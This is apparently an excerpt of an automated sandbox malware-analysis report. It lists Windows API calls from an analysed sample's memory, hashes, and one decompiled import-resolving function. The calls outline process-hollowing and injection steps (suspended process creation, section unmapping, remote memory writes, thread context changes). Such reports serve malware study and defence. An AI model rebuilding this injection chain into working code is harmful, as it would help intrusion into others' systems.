                        • Part of subcall function 01413ECF: CloseHandle.KERNEL32(?), ref: 01413F98
                        • Part of subcall function 01413ECF: StrRChrA.SHLWAPI(014111A9,00000000,0000005C), ref: 01413FA4
                        • Part of subcall function 01413ECF: lstrcat.KERNEL32(014111A9,0141825D), ref: 01413FDE
                        • Part of subcall function 01413ECF: FindFirstFileA.KERNELBASE(014111A9,?), ref: 01413FF4
                        • Part of subcall function 01413ECF: FindNextFileA.KERNELBASE(?,?), ref: 01414026
                        • Part of subcall function 01413ECF: StrChrA.SHLWAPI(?,0000002E), ref: 01414094
                        • Part of subcall function 01413ECF: memcpy.NTDLL(0141618C,?,00000000), ref: 014140CD
                        • Part of subcall function 01413ECF: FindNextFileA.KERNELBASE(?,?), ref: 014140E2
                        • Part of subcall function 01413ECF: CompareFileTime.KERNEL32(?,?), ref: 0141410B
                        • Part of subcall function 01413ECF: HeapFree.KERNEL32(00000000,0141618C,01418049), ref: 01414141
                        • Part of subcall function 01413ECF: HeapFree.KERNEL32(00000000,014111A9), ref: 01414151
                        • Part of subcall function 0141452D: lstrlen.KERNEL32(014111A9,014176D0,01416144,00000000,0141419B,0141618C,0141618C,?,?,?,014111A9,?,0141618C), ref: 01414536
                        • Part of subcall function 0141452D: mbstowcs.NTDLL ref: 0141455D
                        • Part of subcall function 0141452D: memset.NTDLL ref: 0141456F
                      • HeapFree.KERNEL32(00000000,0141618C,0141618C), ref: 014141B7
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$FindFreeHeap$NextTime$CloseCompareCreateFirstHandlelstrcatlstrlenmbstowcsmemcpymemset
                      • String ID:
                      • API String ID: 2813374552-0
                      • Opcode ID: 38cba6166b086ce8eb5c2ad51f40d496e90af9a8cdd139deb63f2cadb27d2ac9
                      • Instruction ID: 5d19dac006f03d20405f96e87ec1843f39dd114d4c8c02bfe9f2ab372ebf7436
                      • Opcode Fuzzy Hash: 38cba6166b086ce8eb5c2ad51f40d496e90af9a8cdd139deb63f2cadb27d2ac9
                      • Instruction Fuzzy Hash: 7B112B79700219EBE7109F99DC48BAD7BB8EB10365F184023E904E7178D7709A41CB24
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • memset.NTDLL ref: 014138CD
                        • Part of subcall function 01413789: memset.NTDLL ref: 014137AB
                        • Part of subcall function 01413789: memcpy.NTDLL(00000218,01414E62,00000100,?,00010003,?,?,00000318,00000008), ref: 01413826
                        • Part of subcall function 01413789: NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 0141387D
                        • Part of subcall function 01413789: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413880
                        • Part of subcall function 01413789: GetLastError.KERNEL32(?,00000318,00000008), ref: 0141389E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 01413633: memset.NTDLL ref: 01413659
                        • Part of subcall function 01413633: memcpy.NTDLL ref: 01413681
                        • Part of subcall function 01413633: GetLastError.KERNEL32(00000010,00000218,01414E3D,00000100,?,00000318,00000008), ref: 01413698
                        • Part of subcall function 01413633: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01414E3D,00000100), ref: 0141377B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Lastmemset$Heapmemcpy$AllocateContextFreeStatusThread
                      • String ID:
                      • API String ID: 1324952413-0
                      • Opcode ID: 212682c493a7cf4ae4d8e54172a10fa41ba57822ea3f729c2063184a6dccab17
                      • Instruction ID: 595e598d7c4cf9d10cc8e78d08efd4f6eeb115c980d6e02b1ef492ed0414da17
                      • Opcode Fuzzy Hash: 212682c493a7cf4ae4d8e54172a10fa41ba57822ea3f729c2063184a6dccab17
                      • Instruction Fuzzy Hash: C601AD715023096BD321AF2AD841B9B7BE9AB55730F00862FF98896365D7B0A90587A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Non-executed Functions

                      APIs
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • GetCurrentThreadId.KERNEL32(?,?,?,01414AE0,?,0141763C,00000000,01412DC5,00000750), ref: 01414A85
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01414AE0,?,0141763C,00000000,01412DC5,00000750), ref: 01414A91
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01414A9F
                      • PathFindExtensionA.SHLWAPI(00000000), ref: 01414AB3
                      • lstrcpy.KERNEL32(00000000), ref: 01414ABA
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentExtensionFindFreeNamePathSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1355202529-0
                      • Opcode ID: 39c17c9fb16b13f8d1e1035eb2ef70ed2250bcfa90eb0dfd7ec0bd794435576c
                      • Instruction ID: 067d25e80c8910238d79384b4d606978ed135eaf766df8735bb7ce78ae202c7b
                      • Opcode Fuzzy Hash: 39c17c9fb16b13f8d1e1035eb2ef70ed2250bcfa90eb0dfd7ec0bd794435576c
                      • Instruction Fuzzy Hash: 4701B9B36012157FE7605FB98C88E6B7E6CAF5468470F0126BB02D3219DBB0DD0447B4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01417614,014116B0,?,01417614), ref: 014129B3
                      • GetVersion.KERNEL32(?,01417614), ref: 014129C2
                      • GetCurrentProcessId.KERNEL32(?,01417614), ref: 014129D1
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01417614), ref: 014129EA
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: 622ff6da3a20cda2a73faf2bb82c593f0c9e35480b174fc837df5645685c5be1
                      • Instruction ID: c342ad11ea549cf4609ea0f36a8713af2336588c4697de7b0b3ba1191cd0267c
                      • Opcode Fuzzy Hash: 622ff6da3a20cda2a73faf2bb82c593f0c9e35480b174fc837df5645685c5be1
                      • Instruction Fuzzy Hash: BFF017B16813219BE7719B6CBC09B553FA4A708762F224956E619C62ECD7F0C441CB58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 01413B46
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 01413B5E
                        • Part of subcall function 01413CB2: NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                        • Part of subcall function 01413CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                        • Part of subcall function 01413CB2: SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$InformationLastMemoryProcessQueryReadStatusVirtualmemset
                      • String ID:
                      • API String ID: 4262940379-0
                      • Opcode ID: 09c5ad6d71bb1f91f1705237dc1bd2e341f1b8f1d622ef1146421d1f9d3a8f7d
                      • Instruction ID: fac16547f79a60a899d703e82f08c7646c2864d2162d5cb4d4b77eecd5e44e65
                      • Opcode Fuzzy Hash: 09c5ad6d71bb1f91f1705237dc1bd2e341f1b8f1d622ef1146421d1f9d3a8f7d
                      • Instruction Fuzzy Hash: BDF062B290021CBAEF20DE91CC05FDEBF7CAB14750F0040A6BA08E2195E370DB44CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: lstrcmplstrlen
                      • String ID: ~
                      • API String ID: 898299967-1707062198
                      • Opcode ID: aa4741a1b8036d1f99d2d9b2fcffcee1c1e7e3ffd88ab73214eda7f62e7a4d04
                      • Instruction ID: e1a7513276d712ac63ea05fe4c5bc627fe25ad3e82a3e934f92d4b8bab95b222
                      • Opcode Fuzzy Hash: aa4741a1b8036d1f99d2d9b2fcffcee1c1e7e3ffd88ab73214eda7f62e7a4d04
                      • Instruction Fuzzy Hash: A701A7B25053159BD720CF6DD8805277FA8FB45671F45096FE90597238C7B1E8078BA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction ID: fbe2dcddc5608dd4e6a16889ea401692cc35dbba972066c2200d210e08997d31
                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction Fuzzy Hash: D021FB729002059FCB10EFA9C8C08A7BFA5FF85350B068459DD168F259D730F915C7E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 01412DAA
                      • CoInitializeEx.OLE32(00000000,00000002), ref: 01412DB5
                      • PathFindExtensionW.SHLWAPI(00000000), ref: 01412DD0
                      • lstrcpyW.KERNEL32(00000000,01418224), ref: 01412DE5
                      • lstrlen.KERNEL32(01417614,?,?,?,?,?,?,?,?,?,?,01411853,?), ref: 01412E02
                      • lstrcpyW.KERNEL32(00000000,014184B8), ref: 01412E33
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • wsprintfW.USER32 ref: 01412E6A
                      • ShellExecuteExW.SHELL32(0000003C), ref: 01412E9F
                      • CoUninitialize.OLE32 ref: 01412EB3
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateExecuteExtensionFindFreeInitializePathShellUninitializelstrlenmemsetwsprintf
                      • String ID: <
                      • API String ID: 3500879692-4251816714
                      • Opcode ID: b219993dc4d9f79fc743d894c76a0171d4b16e81d2d64af3cb0f3ed7328ea4ad
                      • Instruction ID: 3fb9c7bf6f09e41127190a47850a0317090ca4921f27db60e1d1597ece960e74
                      • Opcode Fuzzy Hash: b219993dc4d9f79fc743d894c76a0171d4b16e81d2d64af3cb0f3ed7328ea4ad
                      • Instruction Fuzzy Hash: 9831A3B1D01225ABDB21ABB5DC48D9FBF6CEF55750B15401AFA05E3229DBB4CA00CBE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			E00401398(void* __edi, intOrPtr _a4) {
                      				_Unknown_base(*)()* _v4;
                      				intOrPtr _v8;
                      				struct HINSTANCE__* _v12;
                      				signed int _v16;
                      				intOrPtr _t23;
                      				struct HINSTANCE__* _t24;
                      				intOrPtr _t27;
                      				intOrPtr _t28;
                      				_Unknown_base(*)()* _t29;
                      				intOrPtr _t33;
                      				intOrPtr* _t34;
                      				intOrPtr _t35;
                      				void* _t42;
                      				CHAR* _t44;
                      				intOrPtr* _t46;
                      				CHAR* _t49;
                      				signed int* _t50;
                      				intOrPtr _t57;
                      
                      				_t42 = __edi;
                      				_t50 =  &_v16;
                      				_v16 = _v16 & 0x00000000;
                      				_t33 =  *((intOrPtr*)(_a4 + 0x80));
                      				if(_t33 == 0) {
                      					L23:
                      					return _v16;
                      				}
                      				_t34 = _t33 + __edi;
                      				_t23 =  *((intOrPtr*)(_t34 + 0xc));
                      				if(_t23 == 0) {
                      					goto L23;
                      				}
                      				while(1) {
                      					_t44 = _t23 + _t42;
                      					_t24 = LoadLibraryA(_t44);
                      					_v12 = _t24;
                      					if(_t24 == 0) {
                      						break;
                      					}
                      					memset(_t44, 0, lstrlenA(_t44));
                      					_t27 =  *_t34;
                      					_t35 =  *((intOrPtr*)(_t34 + 0x10));
                      					_t50 =  &(_t50[3]);
                      					if(_t27 != 0) {
                      						L6:
                      						_t46 = _t27 + _t42;
                      						_t28 =  *_t46;
                      						if(_t28 == 0) {
                      							L19:
                      							_t23 =  *((intOrPtr*)(_t34 + 0x20));
                      							_t34 = _t34 + 0x14;
                      							if(_t23 != 0) {
                      								continue;
                      							}
                      							L22:
                      							goto L23;
                      						}
                      						_v8 = _t35 - _t46 + _t42;
                      						_t57 = _t28;
						L8:
                      						if(_t57 < 0) {
                      							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
                      								_t28 = 0;
                      							}
                      						} else {
                      							_t28 = _t28 + _t42;
                      						}
                      						_t11 = _t28 + 2; // 0x2
                      						_t49 = _t11;
                      						_t29 = GetProcAddress(_v12, _t49);
                      						_v4 = _t29;
                      						if(_t29 == 0) {
                      							goto L18;
                      						}
                      						if(_t49 >= 0) {
                      							memset(_t49, 0, lstrlenA(_t49));
                      							_t50 =  &(_t50[3]);
                      						}
                      						 *(_v8 + _t46) = _v4;
                      						_t46 = _t46 + 4;
                      						_t28 =  *_t46;
                      						if(_t28 != 0) {
                      							goto L8;
                      						} else {
                      							goto L19;
                      						}
                      						L18:
                      						_v16 = 0x7f;
                      						goto L19;
                      					}
                      					_t27 = _t35;
                      					if(_t35 == 0) {
                      						goto L19;
                      					}
                      					goto L6;
                      				}
                      				_v16 = 0x7e;
                      				goto L22;
                      			}

                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 004013C5
                      • lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                      • memset.NTDLL ref: 004013E2
                      • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                      • lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                      • memset.NTDLL ref: 0040144A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
                       • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
                       • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: lstrlenmemset$AddressLibraryLoadProc
                      • String ID: ~
                      • API String ID: 1986585659-1707062198
                      • Opcode ID: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction ID: 9cfa27cb60d09a088f87bbc70088036487facf95daeb84733a0c8259cf0c0f36
                      • Opcode Fuzzy Hash: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction Fuzzy Hash: 2E3158716043028BD7149F19DD80B6B77E8AF44388F14043EED81EB3B2E778E8048B6A
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(01417614,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01414A00
                      • GetLastError.KERNEL32(?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A0D
                      • WriteFile.KERNEL32(00000000,?,00001000,01417614,00000000), ref: 01414A23
                      • SetEndOfFile.KERNEL32(00000000,?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A2E
                      • GetLastError.KERNEL32(?,01412D15,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01414A36
                      • CloseHandle.KERNEL32(00000000), ref: 01414A3F
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseCreateHandleWrite
                      • String ID:
                      • API String ID: 2256172639-0
                      • Opcode ID: fcefd6a196670f8dd9ab4655ae71df5f51b2b5d0609eaa6c0438a163621be591
                      • Instruction ID: f7e4bd37621db7a61d9f002c674db521e7e49931374c48150f1ec9a9c05b5e8d
                      • Opcode Fuzzy Hash: fcefd6a196670f8dd9ab4655ae71df5f51b2b5d0609eaa6c0438a163621be591
                      • Instruction Fuzzy Hash: B4F04932100124BBC7309A65AC08EAB7F7DEB467F1B064115FA0AD21A8D7708805D7A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 014113BA
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 014113F9
                      • GetLastError.KERNEL32 ref: 01411429
                      • HeapFree.KERNEL32(00000000,?), ref: 0141143B
                        • Part of subcall function 0141225F: memset.NTDLL ref: 01412282
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                        • Part of subcall function 0141225F: WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                        • Part of subcall function 0141225F: SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 0141225F: GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?), ref: 014123A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Thread$ErrorLastResumememset$CreateFreeHeapObjectProcessSingleSuspendWait
                      • String ID: D
                      • API String ID: 1692557788-2746444292
                      • Opcode ID: 1d6f1699cd2a41501ac06ffdfb99ec79583acf338987c4604ab8fda2320a4dc8
                      • Instruction ID: 7696a41662b4426b2342b016aa6f2f22d92356979424920b0a2bb393856a9626
                      • Opcode Fuzzy Hash: 1d6f1699cd2a41501ac06ffdfb99ec79583acf338987c4604ab8fda2320a4dc8
                      • Instruction Fuzzy Hash: 2511B471901229BBDB21ABE5DC45EDFBFBDEF49B50F110022F708A2124D2B15905CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01414958
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,01412BAA,0141763C,00000000,00000000,?,00000000,0141306A,?,?), ref: 01414968
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 01414994
                      • GetLastError.KERNEL32(?,?,01412BAA,0141763C,00000000,00000000,?,00000000,0141306A,?,?), ref: 014149B9
                      • CloseHandle.KERNEL32(000000FF), ref: 014149CA
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID:
                      • API String ID: 3493789272-0
                      • Opcode ID: b99df490942ed271e9205e883bf5cb8e1fe80e9603afa55dadeef939c9c1dc02
                      • Instruction ID: 2762cd1761b156a38a80a8c71264729638699b53dc793e5f57eb11b9cdfb8601
                      • Opcode Fuzzy Hash: b99df490942ed271e9205e883bf5cb8e1fe80e9603afa55dadeef939c9c1dc02
                      • Instruction Fuzzy Hash: B611D6B2110214BFDB215F79CC88EAF7FAAEB05360F194627FA1597274D7709D4187A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 01412130
                        • Part of subcall function 01411F7B: memset.NTDLL ref: 01411FB7
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 014121BA
                      • WaitForSingleObject.KERNEL32(00000064), ref: 014121C8
                      • SuspendThread.KERNEL32(?), ref: 014121DB
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 01411C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                        • Part of subcall function 01411C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                        • Part of subcall function 01411C29: CloseHandle.KERNEL32(00000000), ref: 01411E61
                        • Part of subcall function 01411C29: memset.NTDLL ref: 01411E75
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: 7429b5367e495f30b373af6f3bc42dcb3e2f3bd3926a845ce2f39d86c92b47f0
                      • Instruction ID: 9e6d15661e44ad383eba4bc32ee4cbfc59bdffbec527de130ef4ecf053351179
                      • Opcode Fuzzy Hash: 7429b5367e495f30b373af6f3bc42dcb3e2f3bd3926a845ce2f39d86c92b47f0
                      • Instruction Fuzzy Hash: E6316C71104302AFE721DF54D840EABBBE9BB98350F14492EFA94D2278D771D964CB52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(00000000,?,?,01413030,00000000,?), ref: 0141420B
                      • lstrlen.KERNEL32(01413030,?,01413030,00000000,?), ref: 01414216
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0141422B
                      • wsprintfW.USER32 ref: 01414243
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeapwsprintf
                      • String ID:
                      • API String ID: 2281473501-0
                      • Opcode ID: 7ed672baa5800d2c3b8348b3741d570b34d12a075061b65732c048cfb59737c7
                      • Instruction ID: 9d6bfcb124018efe1fede0a6c2a8ef891219d0318d812218fedf8f2e96140b89
                      • Opcode Fuzzy Hash: 7ed672baa5800d2c3b8348b3741d570b34d12a075061b65732c048cfb59737c7
                      • Instruction Fuzzy Hash: 7CF05432541224BBCB226F99DC049DB7F65EB05791B0A8126FE0997229D771D950CBC0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 01413659
                      • memcpy.NTDLL ref: 01413681
                        • Part of subcall function 01413D34: NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                        • Part of subcall function 01413D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                        • Part of subcall function 01413D34: SetLastError.KERNEL32(00000000), ref: 01413D73
                      • GetLastError.KERNEL32(00000010,00000218,01414E3D,00000100,?,00000318,00000008), ref: 01413698
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01414E3D,00000100), ref: 0141377B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Last$MemoryStatusVirtual$AllocateWritememcpymemset
                      • String ID:
                      • API String ID: 397557795-0
                      • Opcode ID: 0dd1f1c876c167022c228dfd3f9731e9ea55e52509213e661a9563266221c1e2
                      • Instruction ID: bab5bb315a27cde93cc63c2bebef7224b330771c699d3efc3d130abd21f245ba
                      • Opcode Fuzzy Hash: 0dd1f1c876c167022c228dfd3f9731e9ea55e52509213e661a9563266221c1e2
                      • Instruction Fuzzy Hash: C64183B1504302AFD721DF29DC41F9BBBF9BBA8320F00892EF599C6264E770D5158B62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Executed Functions

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 176 37dcd8-37dd0e call 395b55 179 37dd10-37dd1e StrRChrA 176->179 180 37dd4a-37dd74 call 38a02c 176->180 181 37dd23 179->181 182 37dd20-37dd21 179->182 187 37dd76-37dd7a 180->187 188 37dd92-37dd9a 180->188 184 37dd29-37dd44 _strupr lstrlen call 38215f 181->184 182->184 184->180 187->188 190 37dd7c-37dd87 187->190 191 37dda1-37ddbf CreateEventA 188->191 192 37dd9c-37dd9f 188->192 190->188 195 37dd89-37dd90 190->195 193 37ddf3-37ddf9 GetLastError 191->193 194 37ddc1-37ddc8 call 37d50a 191->194 196 37ddff-37de06 192->196 198 37ddfb-37ddfd 193->198 194->193 202 37ddca-37ddd1 194->202 195->188 195->195 199 37de15-37de1a 196->199 200 37de08-37de0f RtlRemoveVectoredExceptionHandler 196->200 198->196 198->199 200->199 203 37dde4-37dde7 call 37d7ee 202->203 204 37ddd3-37dddf RtlAddVectoredExceptionHandler 202->204 206 37ddec-37ddf1 203->206 204->203 206->193 206->198
                      APIs
                      • StrRChrA.SHLWAPI(0039D298,00000000,0000005C), ref: 0037DD14
                      • _strupr.NTDLL ref: 0037DD2A
                      • lstrlen.KERNEL32(0039D298), ref: 0037DD32
                        • Part of subcall function 0038A02C: NtOpenProcess.NTDLL(?,00000400,?,0039D2DC), ref: 0038A073
                        • Part of subcall function 0038A02C: NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0038A086
                        • Part of subcall function 0038A02C: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?,00000000), ref: 0038A0A2
                        • Part of subcall function 0038A02C: NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 0038A0BF
                        • Part of subcall function 0038A02C: memcpy.NTDLL(00000000,00000000,0000001C), ref: 0038A0CC
                        • Part of subcall function 0038A02C: NtClose.NTDLL(?), ref: 0038A0DE
                        • Part of subcall function 0038A02C: NtClose.NTDLL(?), ref: 0038A0E8
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDB2
                      • RtlAddVectoredExceptionHandler.NTDLL(00000000,0037D30B), ref: 0037DDD9
                        • Part of subcall function 0037D7EE: memset.NTDLL ref: 0037D836
                        • Part of subcall function 0037D7EE: CreateMutexA.KERNEL32(00000000,00000001,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D86F
                        • Part of subcall function 0037D7EE: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D87A
                        • Part of subcall function 0037D7EE: CloseHandle.KERNEL32(0039D260), ref: 0037D892
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D8EA
                        • Part of subcall function 0037D7EE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0037D92F
